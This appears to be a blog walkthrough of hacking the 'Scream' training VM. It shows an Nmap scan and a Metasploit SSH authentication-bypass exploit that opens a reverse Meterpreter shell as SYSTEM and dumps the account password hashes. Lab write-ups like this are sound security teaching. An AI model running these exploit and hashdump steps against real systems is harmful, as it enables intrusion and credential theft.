Scream VM – The Easy Way

So this one was more work to build then it was to crack… That being said there is a harder way so stay tuned for that 🙂

-Download ISO
– Download Scream.exe
– Install .NET 4.0
– Run Scream.exe point it to the ISO and give it an XP license key.
– Choose a place to save the ISO file it creates.
– Use resulting ISO file to build a VM.

Enumeration

# Nmap 6.47 scan initiated Tue Jan 20 21:02:29 2015 as: nmap -Pn -T4 -sS -sV -oN results/172.16.28.135/172.16.28.135-tcp-standard.txt -oG results/172.16.28.135/172.16.28.135-tcp-greppable.txt 172.16.28.135
Nmap scan report for 172.16.28.135
Host is up (0.00047s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     WAR-FTPD 1.65 (Name Scream XP (SP2) FTP Service)
22/tcp open  ssh     WeOnlyDo sshd 2.1.3 (protocol 2.0)
23/tcp open  domain  ISC BIND login
80/tcp open  http    Tinyweb httpd 1.93
MAC Address: 00:0C:29:D0:FC:44 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Tue Jan 20 21:03:18 2015 -- 1 IP address (1 host up) scanned in 49.01 seconds

We see a few interesting ports, and services. The one that stands out to me the most is:

22/tcp open  ssh     WeOnlyDo sshd 2.1.3 (protocol 2.0)

A quick search for “WeOnlyDo ssh” brings me here:
http://www.exploit-db.com/exploits/23080/

Exploitation

Found a Metasploit module to help with the testing…

use exploit/windows/ssh/freesshd_authbypass


msf exploit(freesshd_authbypass) > set RhOST 172.16.28.135
RhOST => 172.16.28.135
msf exploit(freesshd_authbypass) > show options

Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOST      172.16.28.135                                                  yes       The target address
   RPORT      22                                                             yes       The target port
   USERNAME                                                                  no        A specific username to try
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       File containing usernames, one per line


Exploit target:

   Id  Name
   --  ----
   0   Freesshd <= 1.2.6 / Windows (Universal)


msf exploit(freesshd_authbypass) > exploit [*] Started reverse handler on 172.16.28.245:4444 [*] Trying username '4Dgifts' [*] Trying username 'EZsetup' [*] Trying username 'OutOfBox' [*] Trying username 'ROOT' [*] Trying username 'adm' [*] Trying username 'admin' [*] Uploading payload, this may take several minutes... [*] Sending stage (770048 bytes) to 172.16.28.135 [*] Meterpreter session 1 opened (172.16.28.245:4444 -> 172.16.28.135:1248) at 2015-01-20 22:18:01 -0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 3160 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>hostname hostname Scream meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: alex:1003:aad3b435b51404eeaad3b435b51404ee:504182f8417ed8557b67e96adc8b4d04::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:64e03ce932ed854fada1b28703190507:dad93a52ba6e7a70cd49350c40909237::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b1589ba9c1a23c5ddbbb738159f15540::: meterpreter >

1 thought on “Scream VM – The Easy Way

Leave a Reply

Your email address will not be published. Required fields are marked *

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.